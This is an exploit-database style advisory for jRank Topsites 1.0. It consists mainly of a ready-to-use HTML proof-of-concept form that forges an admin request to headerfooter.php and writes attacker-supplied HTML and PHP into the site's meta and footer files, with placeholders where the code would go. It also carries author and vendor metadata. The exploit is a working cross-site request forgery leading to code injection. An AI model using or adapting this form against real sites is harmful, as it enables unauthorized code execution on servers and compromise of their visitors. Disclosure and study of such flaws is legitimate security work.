jRank Topsites 1.0 Cross Site Request Forgery / Code Injection

jRank Topsites version 1.0 suffers from a cross site request forgery vulnerability that allows for PHP code injection vulnerability.


MD5 | f9c9dacf3c805760fedafa777dff54be

<!--
# # # # #
# Exploit Title: jRank - Topsites Script 1.0 - Cross-Site Request Forgery
# Dork: N/A
# Date: 10.09.2017
# Vendor Homepage: https://topsitesscript.com/
# Software Link: https://topsitesscript.com/topsites-script-demo/
# Demo: http://www.topsitesscript.com/demo/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
-->
<form action="http://localhost/[PATH]/admin/headerfooter.php" method="post">
<input name="action" value="edit" type="hidden">
<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
<tbody>
<tr bgcolor="#3498DB">
<td><b style="color:#FFFFFF;">Meta Tags File</b></td>
</tr>
<tr bgcolor="#FFFFFF">
<td>
<textarea cols="10" rows="2" name="meta" style="width: 100%">
<!--
Html Code etc.....
-->
</textarea>
</td>
</tr>
</tbody>
</table>
<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
<tbody>
<tr bgcolor="#3498DB">
<td><b style="color:#FFFFFF;">Footer File</b></td>
</tr>
<tr bgcolor="#FFFFFF">
<td><textarea cols="60" rows="7" name="footer" style="width: 100%">
<!--
Php Code etc.....
-->
</textarea>
</td>
</tr>
<tr bgcolor="#FFFFFF">
<td>
<font face="verdana" size="2"><center><input name="submit" value="Edit" type="submit"></center></font>
</td>
</tr>
</tbody>
</table>
</form>


Related Posts